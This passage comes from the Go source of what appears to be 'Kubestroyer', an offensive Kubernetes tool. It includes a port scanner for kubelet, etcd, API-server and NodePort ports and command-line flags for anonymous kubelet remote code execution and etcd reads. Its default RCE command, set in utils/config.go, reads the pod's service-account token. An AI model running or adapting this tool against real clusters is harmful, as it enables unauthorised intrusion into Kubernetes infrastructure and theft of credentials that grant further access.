<= 32767; port++ { nodeportScan(target, port) } } target = "http://" + target endpoint := "/" for port := range utils.KnownPorts { if port == 10250 || port == 443 { target := strings.Replace(target, "http", "https", 1) if port == 10250 { endpoint = "/metrics" } sendHttpRequest(target, port, endpoint) endpoint = "/" } else { sendHttpRequest(target, port, endpoint) } } if len(openPort) != 0 { for _, port := range openPort { fmt.Println("\x1b[1;32m[+]\x1b[0m port " + strconv.Itoa(port) + " open (" + utils.KnownPorts[port] + ")") } } else { fmt.Println("\x1b[1;31mNo open ports found !\x1b[0m") } fmt.Println(utils.Split) } ================================================ FILE: utils/config.go ================================================ package utils import ( "github.com/pborman/getopt/v2" ) type RunningPods struct { Kind string `json:"kind"` APIVersion string `json:"apiVersion"` Metadata struct { } `json:"metadata"` Items []struct { Metadata struct { Name string `json:"name"` Namespace string `json:"namespace"` UID string `json:"uid"` CreationTimestamp interface{} `json:"creationTimestamp"` } `json:"metadata"` Spec struct { Containers []struct { Name string `json:"name"` Image string `json:"image"` Resources struct { } `json:"resources"` } `json:"containers"` } `json:"spec"` Status struct { } `json:"status"` } `json:"items"` } var Target string var Targets []string var AnonRce = false var RceCommand = "cat /var/run/secrets/kubernetes.io/serviceaccount/token" var ScanNode = false var ScanEtcd = false func Config() { getopt.FlagLong(&Target, "target", 't', "Target (IP, domain or file)").Mandatory() getopt.FlagLong(&ScanNode, "node-scan", 0, "Enable/disable node port scan").SetOptional() getopt.FlagLong(&AnonRce, "anon-rce", 0, "Try to RCE if kubelet API is open").SetOptional() getopt.Flag(&RceCommand, 'x', "Command to execute when using RCE") getopt.FlagLong(&ScanEtcd, "etcd", 0, "Try Etcd anonymous read").SetOptional() getopt.Parse() } ================================================ FILE: utils/display.go ================================================ package utils var Toolname string = ` _ __ _ _ | | / / | | | | | |/ / _ _| |__ ___ ___| |_ _ __ ___ _ _ ___ _ __ | \| | | | '_ \ / _ \/ __| __| '__/ _ \| | | |/ _ \ '__| v0.3.0 | |\ \ |_| | |_) | __/\__ \ |_| | | (_) | |_| | __/ | \_| \_/\__,_|_.__/ \___||___/\__|_| \___/ \__, |\___|_| __/ | |___/ ` var Author = ` By Rolix` var Split = ` --------------------------------------------------------` ================================================ FILE: utils/ports.go ================================================ package utils func init() { addKnownServicePort() } var KnownPorts = map[int]string{ 443: "Kubernetes API port", 2379: "Etcd", 6666: "Etcd", 4194: "cAdvisor for containers metrics", 6443: "Kubernetes API port", 8443: "Minikube API port", 8080: "Insecure API port", 10250: "Kubelet API anonymous port", 10255: "Kubelet API read only", 10256: "Kube proxy health check server", 9099: "Calico health check server", 6782: "Weave metrics/endpoints", 6783: "Weave metrics/endpoints", 6784: "Weave metrics/endpoints", 44134: "Tiller service listening", } func addKnownServicePort() { for port := 30000; port <= 32767; port++ { KnownPorts[port] = "Possible NodePort service" } }